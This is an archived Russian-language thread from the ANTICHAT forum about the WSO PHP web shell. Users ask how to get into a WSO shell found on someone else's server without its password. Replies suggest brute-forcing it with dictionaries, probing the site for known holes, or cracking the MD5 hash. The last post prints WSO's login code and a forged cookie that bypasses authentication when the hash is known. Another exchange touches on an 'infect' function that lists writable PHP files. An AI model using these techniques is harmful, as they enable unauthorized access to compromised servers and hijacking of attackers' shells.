ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.12.2016, 12:03
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от GTAlex
GTAlex said:
↑
собственно, вопрос как раз был о том, чтобы не парсить
думал, может есть более удобный инструмент для удалённого запуска PHP скриптов
Впринцепи я вам четко ответил по вашему вопросу, а дальше думайте сами как хотите....
|
|
|

20.12.2016, 12:05
|
|
Новичок
Регистрация: 07.09.2009
Сообщений: 1
Провел на форуме: 5451
Репутация:
0
|
|
Да, спасибо - регулярка элементарная.
Именно этот вариант сейчас в работе.
|
|
|

03.01.2017, 03:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 1766
Репутация:
0
|
|
подскажите пожалуйста
есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?
|
|
|
|

04.01.2017, 05:57
|
|
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме: 5619724
Репутация:
2944
|
|
Сообщение от demok
demok said:
↑
подскажите пожалуйста
есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?
Узнать пас не получится, попробуй побрутить доступ к шелу по стандартным словарям, либо проверь сайт на известные уязвимости. Если шел до сих пор там, значит и уязвимости актуальны.
|
|
|

28.01.2017, 19:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 3455
Репутация:
0
|
|
Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?
|
|
|
|

29.01.2017, 01:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от artur1111
artur1111 said:
↑
Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?
В чистом WSO нет такого. Функция может делать что угодно, но точно ничего путного. Возможно ифреймер.
|
|
|
|

30.01.2017, 20:48
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от artur1111
artur1111 said:
↑
Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?
Может делать все то, что в нее заложил прогер, покажите код и мы вам объясним, что к чему!
|
|
|

31.01.2017, 21:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 3455
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
↑
Может делать все то, что в нее заложил прогер, покажите код и мы вам объясним, что к чему!
Уже узнал! она ищет .php файлы которые можно изменить, и выводит список с именами.
|
|
|
|

25.05.2017, 19:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 45893
Репутация:
2
|
|
Сообщение от demok
demok said:
↑
подскажите пожалуйста
есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?
Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла
|
|
|
|

26.05.2017, 11:17
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от Dr_Wile
Dr_Wile said:
↑
Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла
Ну так полагаю, что T.C не знает хэша, а вообще, при наличие хэша не обязательно его брутить!!!
Давайте посмотрим в сторону кода самого шела как происходит авторизация:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"63a9f0ea7bb98050796b649e85481845"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]//пусть условно будет пароль root
//..........
[/COLOR][COLOR="#007700"]if(!empty([/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#FF8000"]//если присутствует пароль [/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) && ([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#FF8000"]// и пароль равен его хэшь сумме [/COLOR][COLOR="#0000BB"]WSOsetcookie[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]),[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// отправляем куку с параметром хэшь хоста и значением хэшь пароля
[/COLOR][COLOR="#007700"]if (!isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])]) || ([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])] !=[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"])) [/COLOR][COLOR="#0000BB"]wsoLogin[/COLOR][COLOR="#007700"](); }[/COLOR][/COLOR]
предположим что у нас HOST: localhost
тогда нам для авторизации, при известном хэше, достаточно будет вставить куку:
421aa90e079fa326b6494f812ad13e79=63a9f0ea7bb980507 96b649e85481845
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|